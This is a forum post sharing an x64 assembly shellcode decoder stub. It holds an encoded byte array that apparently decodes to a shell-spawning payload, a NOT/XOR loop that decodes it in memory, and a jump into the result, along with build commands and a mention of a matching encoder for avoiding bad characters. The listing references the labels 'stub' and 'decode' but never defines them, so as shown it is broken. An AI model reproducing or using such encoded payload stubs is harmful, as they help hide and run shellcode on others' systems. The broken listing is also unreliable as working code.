No announcement yet.

Assembly - XOR & NOT decoder stub example

  • Filter
  • Time
  • Show
Clear All
new posts

  • Assembly - XOR & NOT decoder stub example

    This is a simple x64 assembly example of a shellcode decoder stub. It is simple and adjustments might need to be made for it to work with any particular shellcode.
    The python encoder does not verify if x00 bytes or other bad chars are generated.

    ;title  "xornot"
    ;* Filename: xornot.asm                                                                 *
    ;* Author: Resheph                                                                              *
    ;* Version: 0.1                                                                                 *
    ;* Kernel:                                                                                              *
    ;* ISA: x64                                                                                             *
    ;* Dist: Kali Linux                                                                             *
    ;* Initial Date:                                                                                *
    ;* Purpose: Decoder stub                                                                *
    ; Compile and link using:
    ; nasm -f elf64 ./xornot.asm -o ./xornot.o -g -Z ./errors.log
    ; ld -o ./xornot ./xornot.o
    ; Notes: Linking might not be needed
    ; Syscalls in /usr/include/x86_64-linux-gnu/asm/unistd_64.h
    ; Shellcode may not contain any bad chars
    BITS 64
    GLOBAL _start   ; Entry point for ELF linker
    SECTION .data   ; Initialized data
    SECTION .bss    ; Uninitialized data.
    SECTION .text   ; Code block.
            jmp short stub                  ; Skip memory so we dont execute the encoded shellcode
            encoded: db 0x1d,0x64,0x95,0x05,0x1d,0xee,0x7a,0x37,0x3c,0x3b,0x7a,0x7a,0x26,0x3d,0x06,0x1d,0xdc,0xb2,0x05,0x1d,0xdc,0xb7,0x02,0x1d,0xdc,0xb3,0x1d,0xd6,0x95,0x6e,0x5a,0x50     ; Shellcode
            len     equ $-encoded           ; Calculate length of shellcode
            lea     rsi, [rel encoded]      ; First encoded byte. Remark this is a address relative to rIP (Position Independent Code)
            xor     rcx, rcx                        ; Set rcx to 0
            add     cl, len                         ; Get length of encoded shellcode
    ; Decode using NOT and XOR.
            not     byte [rsi]
            xor byte [rsi], 0xaa    ; XOR with 0xaa. Pick one while encoding, that does not create any bad chars.
            inc     rsi                                     ; Next
            loop decode                             ; Keep decoding
            jmp short encoded               ; Jump to shellcode and execute it
    The encoder for this example can be found here:
    Certified Security Geek